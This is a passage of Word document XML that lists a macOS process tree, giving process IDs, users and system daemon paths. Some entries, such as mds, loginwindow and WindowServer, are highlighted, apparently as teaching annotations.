          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00022 root /usr/libexec/thermald</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00024 _appleevents /System/Library/CoreServices/appleeventsd --server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> |--= 00025 root /usr/libexec/configd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00026 root /System/Library/CoreServices/powerd.bundle/powerd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00029 root /usr/libexec/airportd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00031 root /usr/libexec/warmd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00032 root /System/Library/Frameworks/CoreServices.framework/Frameworks/Metadata.framework/Support/</w:t>
      </w:r>
      <w:r w:rsidRPr="009171B8">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>mds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>(Spotlight indexing servervice)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00036 root /System/Library/CoreServices/iconservicesagent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00037 _iconservices /System/Library/CoreServices/iconservicesd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00038 root /usr/libexec/diskarbitrationd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00041 root /usr/libexec/coreduetd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00042 root /usr/libexec/wdhelper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00044 root /System/Library/PrivateFrameworks/WirelessDiagnostics.framework/Support/awdd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00045 root /usr/libexec/opendirectoryd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00046 root /usr/sbin/wirelessproxd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00048 _mdnsresponder /usr/libexec/discoveryd --udsocket standard --loglevel Basic --logclass Everything --logto asl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00049 root /System/Library/PrivateFrameworks/ApplePushService.framework/apsd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00050 root /System/Library/CoreServices/launchservicesd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00051 _usbmuxd /System/Library/PrivateFrameworks/MobileDevice.framework/Versions/A/Resources/usbmuxd -launchd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00052 root /usr/sbin/securityd -i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00057 root /usr/sbin/blued</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00058 root autofsd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00062 root /usr/libexec/stackshot -t -O</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00063 root /System/Library/PrivateFrameworks/GenerationalStorage.framework/Versions/A/Support/revisiond</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00064 root /System/Library/CoreServices/loginwindow.app/Contents/MacOS/</w:t>
      </w:r>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve">loginwindow </w:t>
      </w:r>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t>console</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00065 root /System/Library/CoreServices/logind</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00066 root /usr/sbin/KernelEventAgent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> |--= 00068 root /usr/libexec/hidd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00069 root /usr/sbin/notifyd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00070 root /usr/libexec/taskgated -s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00072 _distnote /usr/sbin/distnoted daemon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00093 root /System/Library/CoreServices/coreservicesd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00097 root /System/Library/Frameworks/Security.framework/Versions/A/XPCServices/authd.xpc/Contents/MacOS/authd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00098 root /usr/sbin/cfprefsd daemon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00100 root /usr/libexec/diagnosticd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00109 root /System/Library/Frameworks/PCSC.framework/Versions/A/XPCServices/com.apple.ctkpcscd.xpc/Contents/MacOS/com.apple.ctkpcscd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00112 root /System/Library/Frameworks/CryptoTokenKit.framework/ctkd -s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00113 root /usr/libexec/secinitd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00115 _windowserver /System/Library/Frameworks/ApplicationServices.framework/Frameworks/CoreGraphics.framework/Resources/</w:t>
      </w:r>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>WindowServer</w:t>
      </w:r>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> -daemon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00122 root /usr/libexec/discoveryd_helper --loglevel Detailed --logclass Everything --logto asl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00123 _networkd /usr/libexec/networkd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00124 root /usr/libexec/networkd_privileged</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00140 _nsurlsessiond /usr/libexec/nsurlsessiond --privileged</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00141 root /usr/libexec/usbd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00142 root /usr/libexec/nehelper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00143 root /usr/sbin/ntpd -c /private/etc/ntp-restrict.conf -n -g -p /var/run/ntpd.pid -f /var/db/ntp.drift</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00145 root /System/Library/CryptoTokenKit/com.apple.ifdreader.slotd/Contents/MacOS/com.apple.ifdreader</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00148 root sysmond</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00149 root /usr/libexec/watchdogd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00152 _softwareupdate /System/Library/CoreServices/Software Update.app/Contents/Resources/softwareupdated</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00153 root /System/Library/PrivateFrameworks/SoftwareUpdate.framework/Resources/suhelperd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00154 root /System/Library/Frameworks/CoreServices.framework/Frameworks/Metadata.framework/Versions/A/Support/mds_stores</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> |--= 00158 root /System/Library/PrivateFrameworks/AmbientDisplay.framework/Versions/A/XPCServices/com.apple.AmbientDisplayAgent.xpc/Contents/MacOS/com.apple.AmbientDisplayAgent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00166 root /System/Library/Frameworks/Security.framework/Versions/A/XPCServices/com.apple.CodeSigningHelper.xpc/Contents/MacOS/com.apple.CodeSigningHelper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00173 root /System/Library/PrivateFrameworks/TCC.framework/Resources/tccd system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00174 root /System/Library/PrivateFrameworks/AccountPolicy.framework/XPCServices/com.apple.AccountPolicyHelper.xpc/Contents/MacOS/com.apple.AccountPolicyHelper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00176 _locationd /usr/libexec/locationd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00177 _nsurlstoraged /usr/libexec/nsurlstoraged</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00178 root /usr/libexec/securityd_service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00181 root1 /usr/sbin/cfprefsd agent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00184 root /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/CVMServer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00187 root /usr/libexec/UserEventAgent (Aqua)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
